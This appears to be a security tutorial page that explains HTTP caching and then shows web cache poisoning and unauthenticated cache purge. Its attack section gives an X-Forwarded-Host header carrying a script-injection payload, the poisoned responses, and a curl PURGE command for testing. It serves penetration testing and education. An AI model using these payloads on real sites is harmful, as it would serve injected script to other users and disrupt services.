Web Cache Poisoning
HTTP caching overview
Caching is a technique that stores a copy of a given resource and serves it back when requested. When a web cache has a requested resource in its store, it intercepts the request and returns its copy instead of re-downloading from the originating server.
This achieves several goals:
Server load reduction (the server doesn't have to serve all clients itself),
Improve performance (it takes less time to transmit the resource back).
On the other side, it has to be configured properly as not all resources stay identical forever: it is important to cache a resource only until it changes, not longer.
Private browser caches
A private cache is dedicated to a single user. A browser cache holds all documents downloaded via HTTP by the user. This cache is used to make visited documents available for back/forward navigation, saving, viewing-as-source, etc. without requiring an additional trip to the server. It likewise improves offline browsing of cached content.

Shared proxy caches
A shared cache is a cache that stores responses to be reused by more than one user. For example, an ISP or your company might have set up a web proxy as part of its local network infrastructure to serve many users so that popular resources are reused a number of times, reducing network traffic and latency.

Targets of caching operations
Request methods can be defined as "cacheable" to indicate that responses to them are allowed to be stored for future reuse. The specification RFC7231 defines GET, HEAD, and POST as cacheable, although the overwhelming majority of cache implementations only support GET and HEAD.
The primary cache keys:
Request method,
Target URI.
Common forms of caching entries are:
Successful results of a retrieval request: a
200 OKresponse to aGETrequest containing a resource like HTML documents, images or files,Permanent redirects: a
301 Moved Permanentlyresponse,Error responses: a
404 Not Foundresult page,Incomplete results: a
206 Partial Contentresponse,Responses other than
GETif something suitable for use as a cache key is defined.
Varying responses
A cache entry might also consist of multiple stored responses differentiated by a secondary key, if the request is target of content negotiation.
The Vary HTTP response header determines how to match future request headers to decide whether a cached response can be used rather than requesting a fresh one from the origin server.
When a cache receives a request that can be satisfied by a cached response that has a Vary header field, it must not use that cached response unless all header fields as nominated by the Vary header match in both the original (cached) request and the new request.
Cache control
The Cache-Control (HTTP/1.1) general-header field is used to specify directives for caching mechanisms in both requests and responses. Caching directives are unidirectional, meaning that a given directive in a request is not implying that the same directive is to be given in the response.
The Pragma (HTTP/1.0) header does behave the same as Cache-Control: no-cache, if the Cache-Control header field is omitted in a request. Use Pragma only for backwards compatibility with HTTP/1.0 clients.
No caching
Cache-Control: no-storeThe cache should not store anything about the client request or server response. A request is sent to the server and a full response is downloaded each and every time.
Cache but revalidate
Cache-Control: no-cacheA cache will send the request to the origin server for validation before releasing a cached copy, see: Cache Validation section.
Public cache
Cache-Control: publicThe public directive indicates the response may be cached by any cache, even if the response would normally be non-cacheable.
Private cache
Cache-Control: privateThe private directive indicates that the response is intended for a single user only and must not be stored by a shared cache. A private browser cache may store the response in this case.
Expiration
Cache-Control: max-age=31536000The max-age directive specify the maximum amount of time in seconds a resource will be considered fresh, see: Freshness section.
Validation
Cache-Control: must-revalidateThe must-revalidate directive indicates that the cache must verify the status of the stale resources before using it and expired ones should not be used, see: Cache Validation section.
Cache validation
When a cached document's expiration time has been reached, it is either validated or fetched again. Validation can only occur if the server provided either a strong validator or a weak validator.
Revalidation is triggered:
If the user presses the reload button,
If the cached response includes the
Cache-control: must-revalidateheader.
ETag
The ETag response header is an opaque-to-the-useragent value that can be used as a strong validator. That means that a HTTP user-agent, such as the browser, does not know what this string represents and can't predict what its value would be. If the ETag header was part of the response for a resource, the client can issue an If-None-Match in the header of future requests – in order to validate the cached resource.
The Last-Modified response header can be used as a weak validator. It is considered weak because it only has 1-second resolution. If the Last-Modified header is present in a response, the client can issue an If-Modified-Since request header to validate the cached document.
When a validation request is made, the server can either ignore the validation request and response with a normal 200 OK, or it can return 304 Not Modified (with an empty body) to instruct the browser to use its cached copy. The latter response can also include headers that update the expiration time of the cached document.
Freshness
Once a resource is stored in a cache, it could theoretically be served by the cache forever. Caches have finite storage so items are periodically removed from storage (cache eviction).
As HTTP is a client-server protocol, servers can't contact caches and clients when a resource changes, they have to communicate an expiration time for the resource. Before this expiration time, the resource is fresh, after the expiration time, the resource is stale. Eviction algorithms often privilege fresh resources over stale resources.
The freshness lifetime is calculated based on several headers:
If a
Cache-control: max-age=Nheader is specified, then the freshness lifetime is equal to N,Else if
Last-Modifiedheader is present, then the freshness lifetime is equal to the value of theDateheader minus the value of theLast-Modifiedheader divided by 10.
Security issues
The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.
Basic cache poisoning
For example, let's take a look at request:
GET /en?cb=1 HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: fooand following response:
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https://foo/img/bar.png" />Here the X-Forwarded-Host header has been used by the application to generate an Open Graph URL inside a meta tag. The next step is to explore whether it's exploitable – start with a simple XSS payload:
GET /en?bar=1 HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: foo."><script>alert(1)</script>HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https://foo."><script>alert(1)</script>"/> That response will execute arbitrary JavaScript against whoever views it. Don't let the Cache Control: no-cache header dissuade you – it's always better to attempt an attack than assume it won't work.
The final step is to check if this response has been stored in a cache so that it'll be delivered to other users. You can verify this first by sending the request without the malicious header, and then by fetching the URL directly in a browser on a different machine:
GET /en?bar=1 HTTP/1.1
Host: vulnerable-website.comHTTP/1.1 200 OK
...
<meta property="og:image" content="https://foo."><script>alert(1)</script>"/>References:
Unauthenticated cache purge
Cache purge allows you to delete stored cache. If the Purge request is available without authentication you can invalidate stored cache, increase bandwidth costs and degrade application performance.
You can check this with the following curl request:
$ curl -X PURGE https://vulnerable-website.com/It a resource vulnerable you will see the answer like the following:
{
"status": "ok",
"id": "4234-1234567890-123123"
}Otherwise, a response will contain an error:
{
"msg": "Credentials are missing or invalid"
}References:
References
Last updated